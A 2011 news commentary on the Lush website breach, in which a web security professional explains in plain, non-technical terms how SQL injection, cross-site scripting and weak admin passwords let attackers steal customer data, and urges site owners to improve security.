Lush.co.uk hacked
NEWS / Friday 21 January 2011
The handmade cosmetics company, Lush, announced on Thursday evening that their website had "become the victim of hackers", advising customers who had placed online orders since 4th October 2010 to "contact their banks for advice as their card details may have been compromised".
Having worked in the web industry with a strong focus on security for thirteen years, this news does not surprise me. Lush is far from being alone – web sites with serious security flaws litter the Internet. In the past few years alone, I’ve uncovered hundreds of serious web security problems, usually managed quietly out of the public eye.
Lush will not provide more details on the attacks, but one of the most likely candidates is a problem us techies call "SQL Injection", a problem that was identified on Lush’s Italian website by an Internet hacking forum on boxing day last year. This same issue was also experienced by the UK parliament’s web site.
So what is SQL Injection? Many websites, especially eCommerce websites, have databases running behind them to hold product information, order data, or even simple news items. To display the right product information on a web page, the sites will often take a reference number or bit of text from a link or form and add it to a question before sending it to the database.
For instance, you might click on a link ending in "?id=5" to be taken to a page showing all the products in the 5th category. Behind the scenes, the website adds that number 5 to a question that it sends to the database. Translating the question into plain English, it would say something like "Get all the information on products in category 5".
The security issue comes when the website fails to check what was passed, and just blindly adds it onto the question it sends to the database. A hacker, by ending the link "?id=5 and get the credit card numbers from the order table" (again, I’ve translated that into English to make it understandable) can manipulate the query to retrieve almost any information they want.
Another extremely common issue is called "XSS". You’ve seen websites that display information you’ve entered such as your name or the search term you entered. Many websites fail to properly check that information before they display it, allowing an attacker to enter little bits of script that get embedded into the page. These scripts will often have access to your cookies, the private bits of text used to control who is logged in. If an attacker can embed a script into a page that someone else sees, they can use it steal your cookies. With an administrator’s stolen cookies, an attacker can access a site’s administration area with potentially disastrous consequences. Even Twitter has been caught out several times by this type of vulnerability.
Passwords can be another serious threat. If the website isn’t set up to force administrators to use secure passwords, you can practically guarantee that someone in your company will be using "password" as their password with obvious consequences. In 2008, Harriet Harman’s blog announced that she was defecting to the Conservative party. The cause of this surprising blogpost? Hariet Harman’s username was set to "Hariet" and her password to "Harman". Yet I still see many, many websites that do not even attempt to prevent their administrators from making these mistakes.
Until website owners and web development companies start taking these issues more seriously, the attacks from hackers will persist. The web industry has improved security dramatically over the past 10 years. But it still has a long way to go.